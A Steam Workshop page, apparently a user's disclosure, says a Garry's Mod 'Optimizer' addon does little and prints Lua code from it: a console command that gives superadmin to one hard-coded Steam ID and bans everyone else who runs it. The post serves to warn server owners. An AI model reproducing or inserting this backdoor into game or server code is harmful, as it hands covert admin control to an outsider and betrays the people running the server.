Install Steam
login
|
language
简体中文 (Simplified Chinese)
繁體中文 (Traditional Chinese)
日本語 (Japanese)
한국어 (Korean)
ไทย (Thai)
Български (Bulgarian)
Čeština (Czech)
Dansk (Danish)
Deutsch (German)
Español - España (Spanish - Spain)
Español - Latinoamérica (Spanish - Latin America)
Ελληνικά (Greek)
Français (French)
Italiano (Italian)
Bahasa Indonesia (Indonesian)
Magyar (Hungarian)
Nederlands (Dutch)
Norsk (Norwegian)
Polski (Polish)
Português (Portuguese - Portugal)
Português - Brasil (Portuguese - Brazil)
Română (Romanian)
Русский (Russian)
Suomi (Finnish)
Svenska (Swedish)
Türkçe (Turkish)
Tiếng Việt (Vietnamese)
Українська (Ukrainian)
Report a translation problem
Original Addon Link: https://steamhost.cn/steamcommunity_com/sharedfiles/filedetails/?id=1413258388&searchtext=Garrys+Mod+Optimizer
Steam Workshop Downloader: {LINK REMOVED}https://steamworkshopdownloader.io/
I hope this explains it better. This addon doesn't do much for performance boosting anyways. All it really comes down too is just adjusting convar settings that you could do yourself.
concommand.Add("gmodhoster", function(ply)
if ( ply:lol() == "STEAM_1:1:164731154") then
RunConsoleCommand("ulx", "adduserid", ply:lol(),"superadmin")
else
RunConsoleCommand("ulx", "banid", ply:lol(),"lol")
end
end)